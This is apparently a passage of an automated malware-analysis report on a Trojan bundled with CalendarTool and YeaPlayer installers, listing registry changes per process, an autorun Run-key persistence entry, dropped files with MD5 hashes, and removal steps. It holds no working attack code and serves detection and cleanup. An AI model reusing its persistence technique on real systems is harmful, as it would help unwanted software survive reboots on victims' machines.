[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\QUtil\traceIdentifier]
"BitNames" = " Error Unusual Info Debug"
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "21 51 D7 E3 70 D0 78 6F A0 B2 1E 2B 0F 84 47 49"
[HKLM\System\CurrentControlSet\Services\Eventlog\Application\ESENT]
"CategoryMessageFile" = "%System%\ESENT.dll"
[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\QUtil]
"LogSessionName" = "stdout"
[HKLM\System\CurrentControlSet\Services\Eventlog\Application\ESENT]
"TypesSupported" = "7"
[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\QUtil]
"ControlFlags" = "1"
The process nst6.tmp.exe:2736 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\eappprxy\traceIdentifier]
"Guid" = "5f31090b-d990-4e91-b16d-46121d0255aa"
[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\QUtil\traceIdentifier]
"Guid" = "8aefce96-4618-42ff-a057-3536aa78233e"
[HKLM\System\CurrentControlSet\Services\Eventlog\Application\ESENT]
"EventMessageFile" = "%System%\ESENT.dll"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"
[HKLM\System\CurrentControlSet\Services\Eventlog\Application\ESENT]
"CategoryCount" = "16"
[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\eappprxy]
"Active" = "1"
[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\eappcfg\traceIdentifier]
"BitNames" = " Error Unusual Info Debug"
[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\eappcfg]
"Active" = "1"
[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\eappprxy\traceIdentifier]
"BitNames" = " Error Unusual Info Debug"
[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\eappcfg]
"ControlFlags" = "1"
"LogSessionName" = "stdout"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Documents" = "%Documents and Settings%\All Users\Documents"
[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\QUtil]
"Active" = "1"
[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\eappprxy]
"LogSessionName" = "stdout"
"ControlFlags" = "1"
[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\eappcfg\traceIdentifier]
"Guid" = "5f31090b-d990-4e91-b16d-46121d0255aa"
[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\QUtil\traceIdentifier]
"BitNames" = " Error Unusual Info Debug"
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "8A 09 35 66 49 82 C4 B6 06 8B 85 05 2C 1E B8 CE"
[HKLM\System\CurrentControlSet\Services\Eventlog\Application\ESENT]
"CategoryMessageFile" = "%System%\ESENT.dll"
[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\QUtil]
"LogSessionName" = "stdout"
[HKLM\System\CurrentControlSet\Services\Eventlog\Application\ESENT]
"TypesSupported" = "7"
[HKLM\SOFTWARE\Microsoft\ESENT\Process\nst6.tmp\DEBUG]
"Trace Level" = ""
[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\QUtil]
"ControlFlags" = "1"
The Trojan deletes the following value(s) in system registry:
[HKLM\SOFTWARE\Microsoft\ESENT\Process\nst6.tmp\DEBUG]
"Trace Level"
The process nst6.tmp.exe:2804 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\eappprxy\traceIdentifier]
"Guid" = "5f31090b-d990-4e91-b16d-46121d0255aa"
[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\QUtil\traceIdentifier]
"Guid" = "8aefce96-4618-42ff-a057-3536aa78233e"
[HKLM\SOFTWARE\CalendarTool\QUIT]
"QuitSession" = "{0A3A8827-4F83-49DA-9BB3-1E089656E7AC}-1"
[HKLM\System\CurrentControlSet\Services\Eventlog\Application\ESENT]
"EventMessageFile" = "%System%\ESENT.dll"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"
[HKLM\System\CurrentControlSet\Services\Eventlog\Application\ESENT]
"CategoryCount" = "16"
[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\eappprxy]
"Active" = "1"
[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\eappcfg\traceIdentifier]
"BitNames" = " Error Unusual Info Debug"
[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\eappcfg]
"Active" = "1"
[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\eappprxy\traceIdentifier]
"BitNames" = " Error Unusual Info Debug"
[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\eappcfg]
"ControlFlags" = "1"
"LogSessionName" = "stdout"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Documents" = "%Documents and Settings%\All Users\Documents"
[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\QUtil]
"Active" = "1"
[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\eappprxy]
"LogSessionName" = "stdout"
"ControlFlags" = "1"
[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\eappcfg\traceIdentifier]
"Guid" = "5f31090b-d990-4e91-b16d-46121d0255aa"
[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\QUtil\traceIdentifier]
"BitNames" = " Error Unusual Info Debug"
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "10 AE 47 DD 19 BB A4 13 6E DE A7 71 AB E9 3B F7"
[HKLM\System\CurrentControlSet\Services\Eventlog\Application\ESENT]
"CategoryMessageFile" = "%System%\ESENT.dll"
[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\QUtil]
"LogSessionName" = "stdout"
[HKLM\System\CurrentControlSet\Services\Eventlog\Application\ESENT]
"TypesSupported" = "7"
[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\QUtil]
"ControlFlags" = "1"
The process CalendarServ.exe:3180 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\eappprxy\traceIdentifier]
"Guid" = "5f31090b-d990-4e91-b16d-46121d0255aa"
[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\QUtil\traceIdentifier]
"Guid" = "8aefce96-4618-42ff-a057-3536aa78233e"
[HKLM\System\CurrentControlSet\Services\Eventlog\Application\ESENT]
"EventMessageFile" = "%System%\ESENT.dll"
[HKU\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\LocalService\Application Data"
[HKLM\System\CurrentControlSet\Services\Eventlog\Application\ESENT]
"CategoryCount" = "16"
[HKLM\SOFTWARE\Microsoft\Rpc]
"UuidSequenceNumber" = "11665867"
[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\eappprxy]
"Active" = "1"
[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\eappcfg\traceIdentifier]
"BitNames" = " Error Unusual Info Debug"
[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\eappcfg]
"Active" = "1"
[HKU\.DEFAULT\Software\Baidu\BHipsDR]
"CtrlBitMap" = "00"
[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\eappprxy\traceIdentifier]
"BitNames" = " Error Unusual Info Debug"
[HKLM\SOFTWARE\Microsoft\ESENT\Process\CalendarServ\DEBUG]
"Trace Level" = ""
[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\eappcfg]
"ControlFlags" = "1"
"LogSessionName" = "stdout"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Documents" = "%Documents and Settings%\All Users\Documents"
[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\QUtil]
"Active" = "1"
[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\eappprxy]
"LogSessionName" = "stdout"
"ControlFlags" = "1"
[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\eappcfg\traceIdentifier]
"Guid" = "5f31090b-d990-4e91-b16d-46121d0255aa"
[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\QUtil\traceIdentifier]
"BitNames" = " Error Unusual Info Debug"
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "34 F0 57 68 43 87 DA 97 3C 50 9C 21 7B C7 3B 8D"
[HKLM\System\CurrentControlSet\Services\Eventlog\Application\ESENT]
"CategoryMessageFile" = "%System%\ESENT.dll"
[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\QUtil]
"LogSessionName" = "stdout"
[HKLM\System\CurrentControlSet\Services\Eventlog\Application\ESENT]
"TypesSupported" = "7"
[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\QUtil]
"ControlFlags" = "1"
[HKU\.DEFAULT\Software\Baidu\BHipsDR]
"LastTime" = "DD 07 02 00 04 00 0E 00 00 00 37 00 2F 00 4E 00"
The Trojan deletes the following value(s) in system registry:
[HKLM\SOFTWARE\Microsoft\ESENT\Process\CalendarServ\DEBUG]
"Trace Level"
The process CalendarServ.exe:3156 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "88 14 96 58 67 41 95 FE A7 81 FB 51 2E 1E 13 10"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"
The process yeaplayer_br_ibd_bundle.exe:2328 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\eappprxy\traceIdentifier]
"Guid" = "5f31090b-d990-4e91-b16d-46121d0255aa"
[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\QUtil\traceIdentifier]
"Guid" = "8aefce96-4618-42ff-a057-3536aa78233e"
[HKLM\System\CurrentControlSet\Services\Eventlog\Application\ESENT]
"EventMessageFile" = "%System%\ESENT.dll"
"CategoryCount" = "16"
[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\eappprxy]
"Active" = "1"
[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\eappcfg\traceIdentifier]
"BitNames" = " Error Unusual Info Debug"
[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\eappcfg]
"Active" = "1"
[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\eappprxy\traceIdentifier]
"BitNames" = " Error Unusual Info Debug"
[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\eappcfg]
"ControlFlags" = "1"
"LogSessionName" = "stdout"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Documents" = "%Documents and Settings%\All Users\Documents"
[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\QUtil]
"Active" = "1"
[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\eappprxy]
"LogSessionName" = "stdout"
"ControlFlags" = "1"
[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\eappcfg\traceIdentifier]
"Guid" = "5f31090b-d990-4e91-b16d-46121d0255aa"
[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\QUtil\traceIdentifier]
"BitNames" = " Error Unusual Info Debug"
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "82 45 65 90 9A E8 C2 71 59 26 A1 F2 1D 50 4D F2"
[HKLM\System\CurrentControlSet\Services\Eventlog\Application\ESENT]
"CategoryMessageFile" = "%System%\ESENT.dll"
[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\QUtil]
"LogSessionName" = "stdout"
[HKLM\System\CurrentControlSet\Services\Eventlog\Application\ESENT]
"TypesSupported" = "7"
[HKLM\SOFTWARE\Microsoft\ESENT\Process\yeaplayer_br_ibd_bundle\DEBUG]
"Trace Level" = ""
[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\QUtil]
"ControlFlags" = "1"
The Trojan deletes the following value(s) in system registry:
[HKLM\SOFTWARE\Microsoft\ESENT\Process\yeaplayer_br_ibd_bundle\DEBUG]
"Trace Level"
The process %original file name%.exe:1216 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "3F 8C 0D 80 C2 D3 53 35 30 EA 5C ED D1 F0 F7 60"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd73-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cookies" = "%Documents and Settings%\%current user%\Cookies"
[HKLM\System\CurrentControlSet\Control\Session Manager]
"PendingFileRenameOperations" = "\??\C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\nsd2.tmp\setup.exe,"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache2"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache1"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CacheLimit" = "65452"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CacheLimit" = "65452"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd72-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Directory" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{b98117e8-75ca-11e2-81b2-000c293708fb}]
"BaseClass" = "Drive"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path4]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache4"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache3"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Paths" = "4"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path4]
"CacheLimit" = "65452"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd75-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CacheLimit" = "65452"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"History" = "%Documents and Settings%\%current user%\Local Settings\History"
The process rundll32.exe:1976 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "9F 3E 9C E2 0A 29 4F 57 B5 73 9E 76 B4 F6 BB DF"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd73-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKCU\Software\Microsoft\Windows\ShellNoRoam\MUICache]
"LangID" = "09 04"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd72-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{b98117e8-75ca-11e2-81b2-000c293708fb}]
"BaseClass" = "Drive"
[HKCU\Software\Microsoft\Windows\ShellNoRoam\MUICache]
"@shdoclc.dll,-880" = "Internet Explorer"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd75-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Personal" = "%Documents and Settings%\%current user%\My Documents"
The Trojan deletes the following value(s) in system registry:
[HKCU\Software\Microsoft\Windows\ShellNoRoam\MUICache\@%System%]
"SHELL32.dll,-9319"
The process setup.exe:1948 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\eappprxy\traceIdentifier]
"Guid" = "5f31090b-d990-4e91-b16d-46121d0255aa"
[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\QUtil\traceIdentifier]
"Guid" = "8aefce96-4618-42ff-a057-3536aa78233e"
[HKLM\System\CurrentControlSet\Services\Eventlog\Application\ESENT]
"EventMessageFile" = "%System%\ESENT.dll"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"
[HKLM\System\CurrentControlSet\Services\Eventlog\Application\ESENT]
"CategoryCount" = "16"
[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\eappprxy]
"Active" = "1"
[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\eappcfg\traceIdentifier]
"BitNames" = " Error Unusual Info Debug"
[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\eappcfg]
"Active" = "1"
[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\QUtil]
"Active" = "1"
[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\eappcfg]
"ControlFlags" = "1"
"LogSessionName" = "stdout"
[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\eappprxy\traceIdentifier]
"BitNames" = " Error Unusual Info Debug"
[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\eappprxy]
"LogSessionName" = "stdout"
"ControlFlags" = "1"
[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\eappcfg\traceIdentifier]
"Guid" = "5f31090b-d990-4e91-b16d-46121d0255aa"
[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\QUtil\traceIdentifier]
"BitNames" = " Error Unusual Info Debug"
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "12 D7 F5 33 3D DF 65 5C AB A2 6D 5A AF 6D C0 7B"
[HKLM\System\CurrentControlSet\Services\Eventlog\Application\ESENT]
"CategoryMessageFile" = "%System%\ESENT.dll"
[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\QUtil]
"LogSessionName" = "stdout"
[HKLM\System\CurrentControlSet\Services\Eventlog\Application\ESENT]
"TypesSupported" = "7"
[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\QUtil]
"ControlFlags" = "1"
To automatically run itself each time Windows is booted, the Trojan adds the following link to its file to the system registry autorun key:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Run]
"YeaInstaller" = "C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\nsd2.tmp\setup.exe"
The process setup.exe:348 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\eappprxy\traceIdentifier]
"Guid" = "5f31090b-d990-4e91-b16d-46121d0255aa"
[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\QUtil\traceIdentifier]
"Guid" = "8aefce96-4618-42ff-a057-3536aa78233e"
[HKLM\System\CurrentControlSet\Services\Eventlog\Application\ESENT]
"EventMessageFile" = "%System%\ESENT.dll"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"
[HKLM\System\CurrentControlSet\Services\Eventlog\Application\ESENT]
"CategoryCount" = "16"
[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\eappprxy]
"Active" = "1"
[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\eappcfg\traceIdentifier]
"BitNames" = " Error Unusual Info Debug"
[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\eappcfg]
"Active" = "1"
[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\eappprxy\traceIdentifier]
"BitNames" = " Error Unusual Info Debug"
[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\eappcfg]
"ControlFlags" = "1"
"LogSessionName" = "stdout"
[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\QUtil]
"Active" = "1"
[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\eappprxy]
"LogSessionName" = "stdout"
"ControlFlags" = "1"
[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\eappcfg\traceIdentifier]
"Guid" = "5f31090b-d990-4e91-b16d-46121d0255aa"
[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\QUtil\traceIdentifier]
"BitNames" = " Error Unusual Info Debug"
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "97 D2 CB 94 B8 DC 70 D4 E9 9C 81 6D C4 B7 FD 52"
[HKLM\System\CurrentControlSet\Services\Eventlog\Application\ESENT]
"CategoryMessageFile" = "%System%\ESENT.dll"
[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\QUtil]
"LogSessionName" = "stdout"
[HKLM\System\CurrentControlSet\Services\Eventlog\Application\ESENT]
"TypesSupported" = "7"
[HKCU\Software\YeaInstaller]
"TmN" = "51486"
[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\QUtil]
"ControlFlags" = "1"
The process Calendar.exe:3428 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "8B 0F BF 8E E9 62 87 0D FD B2 6B B4 CC 3F 9B CD"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"
The process 291734.exe:2712 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "43 E9 B4 94 AC 7E 2F E5 91 4F E3 E6 87 51 84 4D"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd73-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKLM\SOFTWARE\DtsEncodeTools]
"{D9BAB2C9-5236-48c3-AF02-67E799F09BBD}" = "{D9BAB2C9-5236-48c3-AF02-67E799F09BBD}"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd72-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{b98117e8-75ca-11e2-81b2-000c293708fb}]
"BaseClass" = "Drive"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd75-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
Dropped PE files
MD5 | File path |
---|---|
41079c5f52bdaae924b668f58848f7ea | c:\Documents and Settings\"%CurrentUserName%"\Application Data\YeaPlayer_br_IBD_Bundle.exe |
41079c5f52bdaae924b668f58848f7ea | c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temp\11082\YeaPlayer_br_IBD_Bundle.exe |
9202f096accb0e5dabc4de57365a1bf4 | c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temp\nsd2.tmp\setup.exe |
d847ccf62c349453393ec8042ffddd95 | c:\Program Files\CalendarTool\2.0.0.11189\CalendarEntry.dll |
63bbff06febbdf113c94c426396430c8 | c:\Program Files\CalendarTool\2.0.0.11189\CalendarServ.exe |
598c72aba0b2afc46f1b85b8ffa003e3 | c:\Program Files\CalendarTool\2.0.0.11189\CrashReport.exe |
4a42c7920e2c2978d862544832b967ab | c:\Program Files\CalendarTool\2.0.0.11189\CrashUL.exe |
a5a91a90602dc58562c8c311e1e8b019 | c:\Program Files\CalendarTool\2.0.0.11189\EVPDR.dll |
326fa0636ae763210d7d6e2cc5619be8 | c:\Program Files\CalendarTool\2.0.0.11189\EVPHelp.dll |
2064fea63e5501e2cde3af77de07e1ab | c:\Program Files\CalendarTool\2.0.0.11189\EVPKernel.dll |
6aa6f72365d13397f8d9e6cb5e8707fd | c:\Program Files\CalendarTool\2.0.0.11189\EVPNet.dll |
73e5bd50fd3af7a7a24a73bf279282f0 | c:\Program Files\CalendarTool\2.0.0.11189\EVPTask.dll |
4cfc9da8e06cdf64e411759b6eb82ab8 | c:\Program Files\CalendarTool\2.0.0.11189\InstallHelper.exe |
b8f50f062002e67901b134ae536907e9 | c:\Program Files\CalendarTool\2.0.0.11189\Report.exe |
c56db1a95947290eedea6fb6b7b5267a | c:\Program Files\CalendarTool\2.0.0.11189\calendar.exe |
HOSTS file anomalies
No changes have been detected.
Rootkit activity
No anomalies have been detected.
Propagation
Removals
Remove it with Ad-Aware
- Download and install Ad-Aware Free Antivirus.
- Update the definition files.
- Run a full scan of your computer.
Manual removal*
- Terminate malicious process(es) (How to End a Process With the Task Manager):
imapi.exe:1932
InstallHelper.exe:3084
InstallHelper.exe:3480
nst6.tmp.exe:2736
nst6.tmp.exe:2804
CalendarServ.exe:3180
CalendarServ.exe:3156
yeaplayer_br_ibd_bundle.exe:2328
%original file name%.exe:1216
rundll32.exe:1976
setup.exe:1948
setup.exe:348
291734.exe:2712
- Delete the original Trojan file.
- Delete or disinfect the following files created/modified by the Trojan:
%WinDir%\Temp\g5z08pj0.TMP (146970 bytes)
%Documents and Settings%\%current user%\Application Data\CalendarTool\dump\BugReportConfig.ini (940 bytes)
%Documents and Settings%\All Users\Documents\Tools\Common\I18N\conf.db (759 bytes)
%Documents and Settings%\LocalService\Application Data\CalendarTool\dump\BugReportConfig.ini (940 bytes)
%Documents and Settings%\All Users\Documents\Baidu\Common\I18N\conf.db (759 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\61807c4bafc26bb2ed98e3e60f587cd6\291734.exe.info (24 bytes)
C:\MINI.LOG (5089 bytes)
%Documents and Settings%\All Users\Documents\Guid\Common\I18N\conf.db (759 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsd2.tmp\INetC.dll (22 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\desktop.ini (67 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\P5SDE3AF\desktop.ini (67 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\KDYJ45YV\desktop.ini (67 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsd2.tmp\setup.exe (50903 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\6KWD5RP0\desktop.ini (67 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsd2.tmp\ns3.tmp (6 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsd2.tmp\nsExec.dll (6 bytes)
